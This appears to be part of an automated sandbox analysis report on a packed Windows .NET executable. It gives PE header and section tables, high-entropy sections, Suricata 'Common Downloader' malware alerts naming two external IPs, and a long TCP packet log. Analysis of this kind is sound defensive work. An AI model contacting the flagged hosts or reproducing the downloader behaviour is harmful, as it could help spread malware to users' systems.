add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5fb4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd8000	0x1f48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd400c	0xd4200	ef12a3fba105ebd295feb66631f947aa	False	0.9429933798615203	data	7.9748723738404985	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd8000	0x1f48	0x2000	3e4fdb32ed0ee7dbe6caafe7be4034b7	False	0.88330078125	data	7.5532433344944385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0xc	0x200	9c3d4e25c568d36584d50b5ee8b72501	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xd80c8	0x1b3f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9697491039426523
RT_GROUP_ICON	0xd9c18	0x14	data	1.05
RT_VERSION	0xd9c3c	0x306	data	0.4418604651162791

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-07T12:49:08.847175+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49713	158.101.44.242	80	TCP
2024-11-07T12:49:10.237782+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49713	158.101.44.242	80	TCP
2024-11-07T12:49:10.966242+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.12	49716	188.114.96.3	443	TCP
2024-11-07T12:49:11.659674+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49717	158.101.44.242	80	TCP
2024-11-07T12:49:15.186421+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.12	49724	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 12:49:00.418792963 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.421960115 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.440818071 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.440838099 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.441044092 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.441056013 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.441513062 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.441560984 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.441977024 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.444005966 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.444835901 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.444863081 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.445498943 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.449834108 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.450366974 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.554971933 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.557914972 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.583039999 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.583056927 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.583148956 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.583602905 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.583615065 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.583671093 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.583822012 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.584261894 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.584311008 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.586275101 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.586333036 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.587110996 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.587204933 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.591118097 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.591969967 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.739917994 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:00.742517948 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:00.956569910 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.104772091 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104788065 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104804039 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104818106 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104829073 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104839087 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104876041 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104938984 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104949951 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.104954958 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.104971886 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.104983091 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.105375051 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.391446114 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.396471977 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.397041082 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.401881933 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.404758930 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.407006025 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.407824993 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.409612894 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.411871910 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.412609100 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.520762920 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.528995037 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.529076099 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.533402920 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.536391020 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.536467075 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.543173075 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.544542074 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.544894934 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.544996977 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.549484968 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.549631119 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.550900936 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.554390907 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.559865952 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.561407089 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.566329002 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.673520088 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.673985958 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.674057961 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.674271107 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.683171034 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.683244944 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.690143108 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.713449955 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.714348078 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.715409994 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.718965054 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.719973087 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.720160007 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.726694107 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.731949091 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.734471083 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.739289045 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.842909098 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.844400883 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.844458103 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.844973087 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.856976032 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.857017040 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.862684965 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.889461040 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.894356966 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.905141115 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.909996986 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.934777021 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.939785004 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.942763090 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.943353891 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:01.947757006 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:01.948160887 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.003530025 CET	49673	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:02.005331993 CET	49674	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:02.018335104 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.056487083 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.056626081 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.064876080 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.064883947 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.069538116 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.069739103 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.073115110 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.073187113 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.073669910 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.073726892 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.089876890 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.094757080 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.132731915 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.179930925 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.194181919 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.197952032 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.198080063 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.204152107 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.209022999 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.218625069 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.262840986 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.262980938 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.274090052 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.274661064 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.275501013 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.276213884 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.279448986 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.280997038 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.333101034 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.378474951 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.403781891 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.404671907 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.404774904 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.405145884 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.405165911 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.405224085 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.405679941 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.427953959 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.441020012 CET	49672	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:02.466892004 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.467829943 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.467947960 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.471725941 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.473407030 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.528578997 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.559627056 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.581490040 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.595745087 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.596600056 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.596688032 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.597491026 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.599675894 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.601074934 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.601615906 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.606066942 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.647711992 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.657440901 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.660710096 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.666024923 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.710597038 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.713171005 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.718099117 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.728288889 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.730434895 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.730484009 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.730496883 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.730544090 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.730668068 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.732495070 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.732614994 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.737545967 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.779712915 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.790450096 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.793116093 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.798074007 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.841713905 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.844177961 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.849035978 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.859146118 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.861335039 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.861417055 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.861701965 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.863882065 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.866451025 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.866588116 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.871268988 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.915760994 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.922229052 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.926008940 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.930973053 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.973119974 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.976411104 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:02.981275082 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:02.999686003 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.000092030 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.000165939 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.000375986 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.001800060 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.002331018 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.002490997 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.007107973 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.051703930 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.055001974 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.058007956 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.062995911 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.105710030 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.108103991 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.113008976 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.130973101 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.131642103 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.131692886 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.132167101 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.134804010 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.134885073 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.135652065 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.140580893 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.189536095 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.192004919 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.236987114 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.240041971 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.264792919 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.265232086 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.265315056 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.265692949 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.267102957 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.267256021 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.268254042 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.272188902 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.315764904 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.320940018 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.323467016 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.328357935 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.370372057 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.372922897 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.377897978 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.396151066 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.396163940 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.396250963 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.396426916 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.396620989 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.396672964 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.398832083 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.398952961 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.399496078 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.403872967 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.451642990 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.452265024 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.454689980 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.690927982 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.865084887 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.865123987 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.865134954 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.865142107 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.865153074 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.865180969 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.865200043 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.865212917 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.865274906 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.865319014 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.867260933 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.867305994 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.867333889 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.867343903 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.867364883 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.867377996 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.867403030 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.867405891 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.867412090 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.867412090 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.868669987 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.868709087 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.869187117 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.869277000 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.873490095 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.873500109 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.873976946 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.873994112 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.989732027 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.992919922 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.997782946 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.997849941 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.997853994 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.997865915 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.997874975 CET	443	49709	13.107.246.45	192.168.2.12
